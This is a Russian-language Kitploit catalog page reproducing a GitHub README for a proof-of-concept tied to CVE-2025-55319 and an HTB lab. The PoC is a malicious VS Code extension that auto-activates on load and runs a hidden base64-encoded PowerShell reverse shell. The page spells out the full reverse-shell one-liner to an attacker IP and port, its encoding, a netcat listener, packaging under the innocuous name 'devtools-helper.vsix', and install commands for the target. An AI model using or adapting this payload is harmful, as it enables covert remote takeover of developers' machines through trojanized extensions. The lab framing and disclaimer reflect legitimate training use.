Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55319-PoC — PoC для CVE-2025-55319 | Kitploit
Инструменты/GitHubGitHub/nephila016/cve-2025-55319-poc
ЭксплуатацияCTFКомандование и УправлениеСоциальная инженерияRed TeamingИнструмент Удаленного ДоступаРазработка Полезной НагрузкиЛаборатории и Практика
GitHubnephila016/cve-2025-55319-poc

CVE-2025-55319-PoC

PoC для CVE-2025-55319

Репозиторий
62 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Ссылка: CVE-2025-55319

Расширение VS Code (.vsix), созданное в рамках Proof-of-concept для задания HTB "Checkpoint". После установки расширение автоматически активируется и запускает скрытую обратную оболочку PowerShell для атакующего.

⚠️ Только для авторизованного использования. Это артефакт CTF/лаборатории. Применяйте его только на машинах, которыми вы владеете или на тестирование которых у вас есть явное разрешение (например, целевой бокс HTB).


Как это работает

  • extension/package.json — манифест расширения. "activationEvents": ["*"] заставляет его запускаться в момент загрузки VS Code, без взаимодействия с пользователем.
  • extension/extension.js — при вызове activate() выполняет полезную нагрузку PowerShell в кодировке base64 с -WindowStyle Hidden -NoProfile для скрытой обратной оболочки.
  • [Content_Types].xml — манифест типов содержимого OpenXML, позволяющий упаковать папку в ZIP как корректный -пакет.
Скачать инструмент
.vsix

Структура

root@kitploit:~
.
├── [Content_Types].xml     # VSIX content-type manifest
└── extension/
    ├── package.json        # extension manifest (activates on "*")
    └── extension.js        # reverse-shell payload

Использование

1. Сформируйте полезную нагрузку

Сгенерируйте обратную оболочку PowerShell в base64 (UTF-16LE), указывающую на вашу атакующую машину:

root@kitploit:~
LHOST=10.10.15.158
LPORT=4443
PS="\$c=New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){\$d=(New-Object System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=(iex \$d 2>&1|Out-String);\$sb=([text.encoding]::ASCII).GetBytes(\$r+'PS> ');\$s.Write(\$sb,0,\$sb.Length);\$s.Flush()}"
echo -n "$PS" | iconv -t UTF-16LE | base64 -w0

Вставьте полученный результат вместо YOUR_BASE64_PAYLOAD_HERE в extension/extension.js:

root@kitploit:~
const payload = '<base64-blob-here>'

2. Запустите слушатель

root@kitploit:~
nc -lvnp 4443

3. Упакуйте в .vsix

.vsix — это просто ZIP-архив с папкой extension/ и манифестом в корне:

root@kitploit:~
# from this directory
zip -r devtools-helper.vsix extension "[Content_Types].xml"

4. Доставка и запуск

Добейтесь установки расширения на целевой машине. Варианты:

  • CLI: code --install-extension devtools-helper.vsix
  • GUI: панель расширений → меню ··· → Установить из VSIX…

При следующем запуске VS Code (или сразу после установки) срабатывает событие активации *, выполняется полезная нагрузка, и ваш слушатель получает оболочку.

root@kitploit:~
$ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.15.158] from ...
PS>

Очистка

После завершения удалите расширение с целевой машины:

root@kitploit:~
code --uninstall-extension devtools.devtools-helper

Примечания

  • Полезная нагрузка предназначена для Windows (PowerShell). Для других платформ измените extension.js.
  • Модуль os импортируется в extension.js, но не используется — удобно, если вы хотите добавить ветвление по os.platform() для поддержки целей на Linux/macOS.
  • При переупаковке увеличивайте version в package.json.